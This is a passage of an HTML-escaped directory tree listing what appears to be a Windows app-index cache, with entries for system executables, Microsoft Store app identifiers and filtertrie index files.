&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_odbcad32_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_powershell_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}_WindowsPowerShell_v1_0_PowerShell_ISE_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; {F38BF404-1D43-42F2-9305-67DE0B28FC23}_regedit_exe
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_549981C3F5F10_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{8AA47365-B2B3-1961-69EB-F866E376B12F}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{8ABD94FB-E7D6-84A6-A997-C918EDDE0AE5}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{923DD477-5846-686B-A659-0FCCD73851A8}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{BB044BFD-25B7-2FAA-22A8-6371A93E0456}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{BD3F924E-55FB-A1BA-9DE6-B50F9F2460AC}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{C1C6F8AC-40A3-0F5C-146F-65A9DC70BBB4}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{C3487933-BE48-A825-BDE0-5DDE03CE6F0A}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{C804BBA7-FA5F-CBF7-8B55-2096E5F972CB}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_AutoGenerated_{DAA168DE-4306-C8BC-8C11-B596240BDDED}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_BingWeather_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_GetHelp_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Getstarted_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_InternetExplorer_Default
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Microsoft3DViewer_8wekyb3d8bbwe!Microsoft_Microsoft3DViewer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_MicrosoftOfficeHub_8wekyb3d8bbwe!Microsoft_MicrosoftOfficeHub
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_MicrosoftSolitaireCollection_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_MicrosoftStickyNotes_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_MixedReality_Portal_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_MSPaint_8wekyb3d8bbwe!Microsoft_MSPaint
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Office_OneNote_8wekyb3d8bbwe!microsoft_onenoteim
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_ScreenSketch_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_SkyDrive_Desktop
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_SkypeApp_kzf8qxf38zg5c!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_AdministrativeTools
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsAlarms_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsCalculator_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsCamera_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_calendar
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; microsoft_windowscommunicationsapps_8wekyb3d8bbwe!microsoft_windowslive_mail
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_Computer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_ControlPanel
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_Explorer
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsFeedbackHub_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsMaps_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_MediaPlayer32
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_Photos_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_RemoteDesktop
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_SecHealthUI_cw5n1h2txyewy!SecHealthUI
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_Windows_Shell_RunDialog
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_WindowsStore_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_XboxApp_8wekyb3d8bbwe!Microsoft_XboxApp
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_XboxGamingOverlay_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_YourPhone_8wekyb3d8bbwe!App
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_ZuneMusic_8wekyb3d8bbwe!Microsoft_ZuneMusic
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; Microsoft_ZuneVideo_8wekyb3d8bbwe!Microsoft_ZuneVideo
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9500;&#9472;&#9472; MSEdge
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9492;&#9472;&#9472; windows_immersivecontrolpanel_cw5n1h2txyewy!microsoft_windows_immersivecontrolpanel
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; ConstraintIndex
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Apps_{82f86e79-1e6c-4aef-a096-e399f9b5483c}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.0.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.1.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.2.filtertrie.intermediate.txt
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Apps.ft
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9492;&#9472;&#9472; Apps.index
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; Apps_{9e100941-3852-4f41-969a-c1bc3cf05997}
&#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp;     &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9474;&nbsp;&nbsp; &#9500;&#9472;&#9472; 0.0.filtertrie.intermediate.txt
